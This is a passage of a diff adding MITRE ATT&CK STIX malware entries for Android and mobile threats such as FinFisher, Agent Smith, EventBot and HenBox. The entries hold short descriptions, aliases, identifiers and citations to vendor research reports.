(Citation: Lookout-EnterpriseApps)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "malware", + "id": "malware--a3dad2be-ce62-4440-953b-00fbce7aba93", + "created": "2017-10-25T14:48:47.363Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0292", + "external_id": "S0292" + }, + { + "source_name": "AndroRAT", + "description": "(Citation: Lookout-EnterpriseApps)" + }, + { + "source_name": "Lookout-EnterpriseApps", + "description": "Lookout. (2016, May 25). 5 active mobile threats spoofing enterprise apps. Retrieved December 19, 2016.", + "url": "https://blog.lookout.com/blog/2016/05/25/spoofed-apps/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows", + "Android" + ], + "x_mitre_domains": [ + "enterprise-attack", + "mobile-attack" + ], + "x_mitre_aliases": [ + "FinFisher", + "FinSpy" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--a5528622-3a8a-4633-86ce-8cdaf8423858", + "type": "malware", + "created": "2018-01-16T16:13:52.465Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0182", + "url": "https://attack.mitre.org/software/S0182", + "source_name": "mitre-attack" + }, + { + "source_name": "FinFisher", + "description": "(Citation: FinFisher Citation) (Citation: Microsoft SIR Vol 21) (Citation: FireEye FinSpy Sept 2017) (Citation: Securelist BlackOasis Oct 2017)" + }, + { + "source_name": "FinSpy", + "description": "(Citation: FireEye FinSpy Sept 2017) (Citation: Securelist BlackOasis Oct 
2017)" + }, + { + "url": "http://www.finfisher.com/FinFisher/index.html", + "description": "FinFisher. (n.d.). Retrieved December 20, 2017.", + "source_name": "FinFisher Citation" + }, + { + "source_name": "Microsoft SIR Vol 21", + "description": "Anthe, C. et al. (2016, December 14). Microsoft Security Intelligence Report Volume 21. Retrieved November 27, 2017.", + "url": "http://download.microsoft.com/download/E/B/0/EB0F50CC-989C-4B66-B7F6-68CD3DC90DE3/Microsoft_Security_Intelligence_Report_Volume_21_English.pdf" + }, + { + "url": "https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html", + "description": "Jiang, G., et al. (2017, September 12). FireEye Uncovers CVE-2017-8759: Zero-Day Used in the Wild to Distribute FINSPY. Retrieved February 15, 2018.", + "source_name": "FireEye FinSpy Sept 2017" + }, + { + "source_name": "Securelist BlackOasis Oct 2017", + "description": "Kaspersky Lab's Global Research & Analysis Team. (2017, October 16). BlackOasis APT and new targeted attacks leveraging zero-day exploit. Retrieved February 15, 2018.", + "url": "https://securelist.com/blackoasis-apt-and-new-targeted-attacks-leveraging-zero-day-exploit/82732/" + }, + { + "url": "https://cloudblogs.microsoft.com/microsoftsecure/2018/03/01/finfisher-exposed-a-researchers-tale-of-defeating-traps-tricks-and-complex-virtual-machines/", + "description": "Allievi, A.,Flori, E. (2018, March 01). FinFisher exposed: A researcher’s tale of defeating traps, tricks, and complex virtual machines. Retrieved July 9, 2018.", + "source_name": "Microsoft FinFisher March 2018" + } + ], + "modified": "2022-03-02T15:47:13.329Z", + "name": "FinFisher", + "description": "[FinFisher](https://attack.mitre.org/software/S0182) is a government-grade commercial surveillance spyware reportedly sold exclusively to government agencies for use in targeted and lawful criminal investigations. It is heavily obfuscated and uses multiple anti-analysis techniques. 
It has other variants including [Wingbird](https://attack.mitre.org/software/S0176). (Citation: FinFisher Citation) (Citation: Microsoft SIR Vol 21) (Citation: FireEye FinSpy Sept 2017) (Citation: Securelist BlackOasis Oct 2017) (Citation: Microsoft FinFisher March 2018)", + "x_mitre_version": "1.4", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_contributors": [ + "Aviran Hazum, Check Point", + "Sergey Persikov, Check Point" + ], + "x_mitre_aliases": [ + "Agent Smith" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--a6228601-03f6-4949-ae22-c1087627a637", + "type": "malware", + "created": "2020-05-07T15:18:34.417Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0440", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0440" + }, + { + "source_name": "CheckPoint Agent Smith", + "url": "https://research.checkpoint.com/2019/agent-smith-a-new-species-of-mobile-malware/", + "description": "A. Hazum, F. He, I. Marom, B. Melnykov, A. Polkovnichenko. (2019, July 10). Agent Smith: A New Species of Mobile Malware. Retrieved May 7, 2020." + } + ], + "modified": "2020-06-17T12:49:21.423Z", + "name": "Agent Smith", + "description": "[Agent Smith](https://attack.mitre.org/software/S0440) is mobile malware that generates financial gain by replacing legitimate applications on devices with malicious versions that include fraudulent ads. 
As of July 2019 [Agent Smith](https://attack.mitre.org/software/S0440) had infected around 25 million devices, primarily targeting India though effects had been observed in other Asian countries as well as Saudi Arabia, the United Kingdom, and the United States.(Citation: CheckPoint Agent Smith)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "Asacub", + "Trojan-SMS.AndroidOS.Smaps" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--a76b837b-93cc-417d-bf28-c47a6a284fa4", + "type": "malware", + "created": "2020-12-14T15:02:35.007Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0540", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0540" + }, + { + "source_name": "Trojan-SMS.AndroidOS.Smaps", + "description": "(Citation: Securelist Asacub)" + }, + { + "source_name": "Securelist Asacub", + "url": "https://securelist.com/the-rise-of-mobile-banker-asacub/87591/", + "description": "T. Shishkova. (2018, August 28). The rise of mobile banker Asacub. Retrieved December 14, 2020." + } + ], + "modified": "2020-12-16T20:21:43.239Z", + "name": "Asacub", + "description": "[Asacub](https://attack.mitre.org/software/S0540) is a banking trojan that attempts to steal money from victims’ bank accounts. 
It attempts to do this by initiating a wire transfer via SMS message from compromised devices.(Citation: Securelist Asacub)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "GPlayed" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--a993495c-9813-4372-b9ec-d168c7f7ec0a", + "type": "malware", + "created": "2020-11-24T17:55:12.561Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0536", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0536" + }, + { + "source_name": "Talos GPlayed", + "url": "https://blog.talosintelligence.com/2018/10/gplayedtrojan.html", + "description": "V. Ventura. (2018, October 11). GPlayed Trojan - .Net playing with Google Market . Retrieved November 24, 2020." 
+ } + ], + "modified": "2020-11-24T17:55:12.561Z", + "name": "GPlayed", + "description": "[GPlayed](https://attack.mitre.org/software/S0536) is an Android trojan with a broad range of capabilities.(Citation: Talos GPlayed) ", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "EventBot" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--aecc0097-c9f8-4786-9b39-e891ff173f54", + "type": "malware", + "created": "2020-06-26T14:55:12.847Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0478", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0478" + }, + { + "source_name": "Cybereason EventBot", + "url": "https://www.cybereason.com/blog/eventbot-a-new-mobile-banking-trojan-is-born", + "description": "D. Frank, L. Rochberger, Y. Rimmer, A. Dahan. (2020, April 30). EventBot: A New Mobile Banking Trojan is Born. Retrieved June 26, 2020." 
+ } + ], + "modified": "2020-06-26T21:01:58.595Z", + "name": "EventBot", + "description": "[EventBot](https://attack.mitre.org/software/S0478) is an Android banking trojan and information stealer that abuses Android’s accessibility service to steal data from various applications.(Citation: Cybereason EventBot) [EventBot](https://attack.mitre.org/software/S0478) was designed to target over 200 different banking and financial applications, the majority of which are European bank and cryptocurrency exchange applications.(Citation: Cybereason EventBot)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "HenBox" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--aef537ba-10c2-40ed-a57a-80b8508aada4", + "type": "malware", + "created": "2020-12-17T20:15:22.110Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0544", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0544" + }, + { + "source_name": "Palo Alto HenBox", + "url": "https://unit42.paloaltonetworks.com/unit42-henbox-chickens-come-home-roost/", + "description": "A. Hinchliffe, M. Harbison, J. Miller-Osborn, et al. (2018, March 13). HenBox: The Chickens Come Home to Roost. Retrieved September 9, 2019." + } + ], + "modified": "2021-04-12T03:02:06.792Z", + "name": "HenBox", + "description": "[HenBox](https://attack.mitre.org/software/S0544) is Android malware that attempts to only execute on Xiaomi devices running the MIUI operating system. 
[HenBox](https://attack.mitre.org/software/S0544) has primarily been used to target Uyghurs, a minority Turkic ethnic group.(Citation: Palo Alto HenBox)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "Riltok" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--c0efbaae-9e7d-4716-a92d-68373aac7424", + "type": "malware", + "created": "2019-08-07T15:57:12.877Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0403", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0403" + }, + { + "description": "Tatyana Shishkova. (2019, June 25). Riltok mobile Trojan: A banker with global reach. 
Retrieved August 7, 2019.", + "url": "https://securelist.com/mobile-banker-riltok/91374/", + "source_name": "Kaspersky Riltok June 2019" + } + ], + "modified": "2019-09-18T13:44:13.080Z", + "name": "Riltok", + "description": "[Riltok](https://attack.mitre.org/software/S0403) is banking malware that uses phishing popups to collect user credentials.(Citation: Kaspersky Riltok June 2019)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "GolfSpy" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--c19cfc89-5ac6-4d2d-a236-70d2b32e007c", + "type": "malware", + "created": "2020-01-27T17:05:57.712Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0421", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0421" + }, + { + "source_name": "Trend Micro Bouncing Golf 2019", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/mobile-cyberespionage-campaign-bouncing-golf-affects-middle-east/", + "description": "E. Xu, G. Guo. (2019, June 28). Mobile Cyberespionage Campaign ‘Bouncing Golf’ Affects Middle East. Retrieved January 27, 2020." 
+ } + ], + "modified": "2020-03-26T20:50:07.023Z", + "name": "GolfSpy", + "description": "[GolfSpy](https://attack.mitre.org/software/S0421) is Android spyware deployed by the group [Bouncing Golf](https://attack.mitre.org/groups/G0097).(Citation: Trend Micro Bouncing Golf 2019)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "Pallas" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--c41a8b7c-3e42-4eee-b87d-ad8a100ee878", + "type": "malware", + "created": "2019-07-10T15:35:43.217Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0399", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0399" + }, + { + "source_name": "Pallas", + "description": "(Citation: Lookout Dark Caracal Jan 2018)" + }, + { + "url": "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf", + "description": "Blaich, A., et al. (2018, January 18). Dark Caracal: Cyber-espionage at a Global Scale. 
Retrieved April 11, 2018.", + "source_name": "Lookout Dark Caracal Jan 2018" + } + ], + "modified": "2019-09-18T20:17:17.744Z", + "name": "Pallas", + "description": "[Pallas](https://attack.mitre.org/software/S0399) is mobile surveillanceware that was custom-developed by [Dark Caracal](https://attack.mitre.org/groups/G0070).(Citation: Lookout Dark Caracal Jan 2018)", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "labels": [ + "malware" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "Circles" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--c6a07c89-a24c-4c7e-9e3e-6153cc595e24", + "type": "malware", + "created": "2021-04-26T15:33:55.798Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0602", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0602" + }, + { + "source_name": "CitizenLab Circles", + "url": "https://citizenlab.ca/2020/12/running-in-circles-uncovering-the-clients-of-cyberespionage-firm-circles/", + "description": "Bill Marczak, John Scott-Railton, Siddharth Prakash Rao, Siena Anstis, and Ron Deibert. (2020, December 1). Running in Circles Uncovering the Clients of Cyberespionage Firm Circles. Retrieved December 23, 2020." + } + ], + "modified": "2021-04-26T15:33:55.798Z", + "name": "Circles", + "description": "[Circles](https://attack.mitre.org/software/S0602) reportedly takes advantage of Signaling System 7 (SS7) weaknesses, the protocol suite used to route phone calls, to both track the location of mobile devices and intercept voice calls and SMS messages. It can be connected to a telecommunications company’s infrastructure or purchased as a cloud service. 
Circles has reportedly been linked to the NSO Group.(Citation: CitizenLab Circles)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "Tiktok Pro" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--c6abcaf8-1765-41f8-9fe5-03d42fd0f6c0", + "type": "malware", + "created": "2021-01-05T20:16:19.968Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0558", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0558" + }, + { + "source_name": "Zscaler TikTok Spyware", + "url": "https://www.zscaler.com/blogs/security-research/tiktok-spyware", + "description": "S. Desai. (2020, September 8). TikTok Spyware. Retrieved January 5, 2021." + } + ], + "modified": "2021-04-19T16:30:16.930Z", + "name": "Tiktok Pro", + "description": "[Tiktok Pro](https://attack.mitre.org/software/S0558) is spyware that has been masquerading as the TikTok application.(Citation: Zscaler TikTok Spyware)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "PJApps", + "description": "[PJApps](https://attack.mitre.org/software/S0291) is an Android malware family. 
(Citation: Lookout-EnterpriseApps)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "malware", + "id": "malware--c709da93-20c3-4d17-ab68-48cba76b2137", + "created": "2017-10-25T14:48:43.527Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0291", + "external_id": "S0291" + }, + { + "source_name": "PJApps", + "description": "(Citation: Lookout-EnterpriseApps)" + }, + { + "source_name": "Lookout-EnterpriseApps", + "description": "Lookout. (2016, May 25). 5 active mobile threats spoofing enterprise apps. Retrieved December 19, 2016.", + "url": "https://blog.lookout.com/blog/2016/05/25/spoofed-apps/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "ShiftyBug", + "description": "[ShiftyBug](https://attack.mitre.org/software/S0294) is an auto-rooting adware family of malware for Android. The family is very similar to the other Android families known as Shedun, Shuanet, Kemoge, though it is not believed all the families were created by the same group. 
(Citation: Lookout-Adware)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "malware", + "id": "malware--c80a6bef-b3ce-44d0-b113-946e93124898", + "created": "2017-10-25T14:48:38.690Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0294", + "external_id": "S0294" + }, + { + "source_name": "ShiftyBug", + "description": "(Citation: Lookout-Adware)" + }, + { + "source_name": "Lookout-Adware", + "description": "Michael Bentley. (2015, November 4). Lookout discovers new trojanized adware; 20K popular apps caught in the crossfire. Retrieved December 21, 2016.", + "url": "https://blog.lookout.com/blog/2015/11/04/trojanized-adware/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-04-21T18:52:08.966Z", + "name": "HummingBad", + "description": "[HummingBad](https://attack.mitre.org/software/S0322) is a family of Android malware that generates fraudulent advertising revenue and has the ability to obtain root access on older, vulnerable versions of Android. (Citation: ArsTechnica-HummingBad)", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_aliases": [ + "HummingBad" + ], + "type": "malware", + "id": "malware--c8770c81-c29f-40d2-a140-38544206b2b4", + "created": "2017-10-25T14:48:42.948Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0322", + "external_id": "S0322" + }, + { + "source_name": "ArsTechnica-HummingBad", + "description": "Dan Goodin. (2016, July 7). 
10 million Android phones infected by all-powerful auto-rooting apps. Retrieved January 24, 2017.", + "url": "http://arstechnica.com/security/2016/07/virulent-auto-rooting-malware-takes-control-of-10-million-android-devices/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "Exobot", + "Marcher" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--c91cec55-634c-4670-ba10-2dc7ceb28e98", + "type": "malware", + "created": "2020-10-29T13:32:20.972Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0522", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0522" + }, + { + "source_name": "Proofpoint-Marcher", + "description": "Proofpoint. (2017, November 3). Credential phishing and an Android banking Trojan combine in Austrian mobile attacks. Retrieved July 6, 2018.", + "url": "https://www.proofpoint.com/us/threat-insight/post/credential-phishing-and-android-banking-trojan-combine-austrian-mobile-attacks" + }, + { + "source_name": "Threat Fabric Exobot", + "url": "https://www.threatfabric.com/blogs/exobot_android_banking_trojan_on_the_rise.html", + "description": "Threat Fabric. (2017, February). Exobot - Android banking Trojan on the rise. Retrieved October 29, 2020." 
+ } + ], + "modified": "2020-12-07T14:28:31.876Z", + "name": "Exobot", + "description": "[Exobot](https://attack.mitre.org/software/S0522) is Android banking malware, primarily targeting financial institutions in Germany, Austria, and France.(Citation: Threat Fabric Exobot)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "OBAD", + "description": "OBAD is an Android malware family. (Citation: TrendMicro-Obad)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "malware", + "id": "malware--ca4f63b9-a358-4214-bb26-8c912318cfde", + "created": "2017-10-25T14:48:44.540Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0286", + "external_id": "S0286" + }, + { + "source_name": "OBAD", + "description": "(Citation: TrendMicro-Obad)" + }, + { + "source_name": "TrendMicro-Obad", + "description": "Veo Zhang. (2013, June 13). Cybercriminals Improve Android Malware Stealth Routines with OBAD. Retrieved December 9, 2016.", + "url": "http://blog.trendmicro.com/trendlabs-security-intelligence/cybercriminals-improve-android-malware-stealth-routines-with-obad/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Android/Chuli.A", + "description": "[Android/Chuli.A](https://attack.mitre.org/software/S0304) is Android malware that was delivered to activist groups via a spearphishing email with an attachment. 
(Citation: Kaspersky-WUC)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.2", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_aliases": [ + "Android/Chuli.A" + ], + "type": "malware", + "id": "malware--d05f7357-4cbe-47ea-bf83-b8604226d533", + "created": "2017-10-25T14:48:45.482Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0304", + "external_id": "S0304" + }, + { + "source_name": "Android/Chuli.A", + "description": "(Citation: Kaspersky-WUC)" + }, + { + "source_name": "Kaspersky-WUC", + "description": "Costin Raiu, Denis Maslennikov, Kurt Baumgartner. (2013, March 26). Android Trojan Found in Targeted Attack. Retrieved December 23, 2016.", + "url": "https://securelist.com/android-trojan-found-in-targeted-attack-58/35552/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Charger", + "description": "[Charger](https://attack.mitre.org/software/S0323) is Android malware that steals steals contacts and SMS messages from the user's device. It can also lock the device and demand ransom payment if it receives admin permissions. 
(Citation: CheckPoint-Charger)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_aliases": [ + "Charger" + ], + "type": "malware", + "id": "malware--d1c600f8-0fb6-4367-921b-85b71947d950", + "created": "2017-10-25T14:48:39.631Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0323", + "external_id": "S0323" + }, + { + "source_name": "Charger", + "description": "(Citation: CheckPoint-Charger)" + }, + { + "source_name": "CheckPoint-Charger", + "description": "Oren Koriat and Andrey Polkovnichenko. (2017, January 24). Charger Malware Calls and Raises the Risk on Google Play. Retrieved January 24, 2017.", + "url": "http://blog.checkpoint.com/2017/01/24/charger-malware/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-04-13T22:33:34.237Z", + "name": "Drinik", + "description": "[Drinik](https://attack.mitre.org/software/S1054) is an evolving Android banking trojan that was observed targeting customers of around 27 banks in India in August 2021. 
Initially seen as an SMS stealer in 2016, [Drinik](https://attack.mitre.org/software/S1054) resurfaced as a banking trojan with more advanced capabilities included in subsequent versions between September 2021 and August 2022.(Citation: cyble_drinik_1022)", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_aliases": [ + "Drinik" + ], + "type": "malware", + "id": "malware--d6e009b7-df5e-447a-bfd2-d5b77374edfe", + "created": "2023-01-18T19:05:43.194Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S1054", + "external_id": "S1054" + }, + { + "source_name": "cyble_drinik_1022", + "description": "Cyble. (2022, October 27). Drinik Malware Returns With Advanced Capabilities Targeting Indian Taxpayers. Retrieved January 18, 2023.", + "url": "https://blog.cyble.com/2022/10/27/drinik-malware-returns-with-advanced-capabilities-targeting-indian-taxpayers/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Trojan-SMS.AndroidOS.OpFake.a", + "description": "[Trojan-SMS.AndroidOS.OpFake.a](https://attack.mitre.org/software/S0308) is Android malware. 
